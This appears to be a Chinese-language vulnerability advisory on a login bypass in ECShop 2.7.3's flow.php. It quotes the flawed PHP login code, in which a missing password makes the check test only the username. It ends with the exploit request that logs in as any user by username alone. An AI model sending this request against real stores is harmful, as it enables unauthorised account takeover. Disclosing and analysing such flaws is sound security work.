ecshop 2.7.3 /flow.php 登录绕过漏洞

<p>影响文件:flow.php&nbsp;188行开始<br></p><pre class="">elseif ($_REQUEST['step'] == 'login') { include_once('languages/'. $_CFG['lang']. '/user.php'); /* * 用户登录注册 */ if ($_SERVER['REQUEST_METHOD'] == 'GET') ..... else { include_once('includes/lib_passport.php'); if (!empty($_POST['act']) &amp;&amp; $_POST['act'] == 'signin') { $captcha = intval($_CFG['captcha']); if (($captcha &amp; CAPTCHA_LOGIN) &amp;&amp; (!($captcha &amp; CAPTCHA_LOGIN_FAIL) || (($captcha &amp; CAPTCHA_LOGIN_FAIL) &amp;&amp; $_ SESSION['login_fail'] &gt; 2)) &amp;&amp; gd_version() &gt; 0) { if (empty($_POST['captcha'])) { show_message($_LANG['invalid_captcha']); } /* 检查验证码 */ include_once('includes/cls_captcha.php'); $validator = new captcha(); $validator-&gt;session_word = 'captcha_login'; if (!$validator-&gt;check_word($_POST['captcha'])) { show_message($_LANG['invalid_captcha']); } } if ($user-&gt;login($_POST['username'], $_POST['password'],isset($_POST['remember']))) { ..... } </pre><p>上面代码中执行了&nbsp;登录操作&nbsp;$user­&gt;login($_POST['username'],&nbsp;$_POST['password'],isset($_POST['remember'])</p><p>login方法如下：</p><pre class="">function login($username, $password, $remember = null) { if ($this-&gt;check_user($username, $password) &gt; 0) { if ($this-&gt;need_sync) { $this-&gt;sync($username,$password); } $this-&gt;set_session($username); $this-&gt;set_cookie($username, $remember); return true; } else { return false; } } function check_user($username, $password = null) { $post_username = $username; /* 如果没有定义密码则只检查用户名 */ if ($password === null) { $sql = "SELECT " . $this-&gt;field_id . " FROM " . $this-&gt;table($this-&gt;user_table). " WHERE " . $this-&gt;field_name . "='" . $post_username . "'"; return $this-&gt;db-&gt;getOne($sql); } else { $sql = "SELECT " . $this-&gt;field_id . " FROM " . $this-&gt;table($this-&gt;user_table). " WHERE " . $this-&gt;field_name . "='" . $post_username . "' AND " . $this-&gt;field_pass . " ='" . $this-&gt; compile_password(array('password'=&gt;$password)) . "'"; return $this-&gt;db-&gt;getOne($sql); } } <br></pre><p>登录操作最终执行check_user方法，当用户密码为null时，只判断用户名。而在flow.php中并没有对密码进行判断或者初始化。可以只通过账号就可</p><p>以实现登录。</p><p><br></p><p>漏洞利用过程</p><p>url:.xxx.com/flow.php?step=login&nbsp;</p><p>POST:act=signin&amp;username=xxxx&amp;captcha=yyyyy</p><p>captcha是验证码，有时候是不需要验证码的</p><p><img alt="1.png" src="https://images.seebug.org/@/uploads/1434684326596-1.png" data-image-size="865,478"><br></p>